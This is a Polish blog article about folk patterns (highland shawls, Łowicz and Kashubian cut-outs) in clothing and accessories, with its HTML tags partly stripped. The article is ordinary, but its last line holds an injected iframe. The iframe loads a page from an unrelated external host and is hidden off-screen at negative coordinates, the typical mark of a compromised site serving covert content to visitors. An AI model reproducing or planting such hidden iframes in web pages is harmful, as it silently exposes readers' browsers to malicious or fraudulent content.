Historia i fakty

Motywy folkowe na ubraniach

22 stycznia 2016 • Opublikowane przez

Motywy folkowe wróciły do łask. Projektanci mody umieszczają je na ubraniach, ale i dodatkach i gadżetach. Co sprawia, że mają tak wielu miłośników?

!–more–

nbsp;

strongMy Słowianie/strong

Do tej pory po motywy folkowe sięgali przede wszystkim twórcy rękodzieła. Dziś są one spotykane na każdym kroku — zaczęli czerpać z nich również i projektanci mody. Najczęściej na ulicach zobaczyć możnastrong spódnice i apaszki/strong. Te pierwsze swoją popularność zawdzięczają Cleo i jej występowi w teledysku do piosenki „My Słowianie” oraz podczas finału konkursu Eurowizji. Chusty za to są często noszone jako apaszki i szaliki jesienią i wiosną, a latem służą jako pareo czy materiał na turban na głowie. Górale zbijają na nich fortunę — nic dziwnego, w końcu wzory zaczerpnięte zostały z ich strojów ludowych. Jednak ludowe spódnice i szale można kupić niemal w każdym regionie. Ale to nie wszystko! Jakie części garderoby również cieszą się popularnością?

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2016/01/sadowska_bluzy.jpg”img class=”size-full wp-image-2651″ src=”http://argos.pl/blog/wp-content/uploads/2016/01/sadowska_bluzy.jpg” alt=”Źródło: naludowo.pl” width=”960″ height=”500″ //a Źródło: naludowo.pl

nbsp;

strongNa randkę i na jogging/strong

Bluzy folkowe są ulubione przez gwiazdy. Nosi je m.in. Margaret, a własną kolekcję wydała Marysia Sadowska. Jej stroje uszyte zostały z chusty ludowej. Bluzy z folkowymi motywami są bardzo dziewczęce i dobrze nadają się na każdą okazję. Można nosić je na co dzień, np. do pracy czy na uczelnię, ale również strongna trening/strong — wygodnie będzie się w nich biegało w chłodniejsze miesiące. Bluza folkowa jest na tyle wdzięczna i kobieca, że można pokusić się nawet o włożenie jej na randkę. Wzory ludowe wykorzystali także stronga href=”http://argos.pl/oferta,23.html”producenci kurtek/a/strong.

nbsp;

strongNie tylko ubrania/strong

Barwne wzory z wycinanek łowickich czy kaszubskich i tradycyjnych chust góralskich mają wzięcie również na dodatkach. Przede wszystkim można spotkać wiele torebek ze wspomnianymi motywami, ale biżuterię. Na festiwalach rękodzieła można zobaczyć prawdziwe cuda —strong naszyjniki, bransoletki, kolczyki/strong. Z duchem mody idzie również wzornictwo przemysłowe — motywy folkowe pojawiają się np. na wymiennych obudowach do telefonu.

nbsp;

Projektanci coraz częściej sięgają do kultury ludowej i bardzo chętnie korzystają z motywów folkowych w swoich projektach. Na pokazach mody coraz częściej zobaczyć można kolekcje nawiązujące do stylu etno-folk. Otrzymają one doskonałe recenzje i uznanie gwiazd. Jesteśmy strongdumni ze spuścizny/strong, którą pozostawili nam przodkowie. Widać to na co dzień. I niech tak pozostani!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe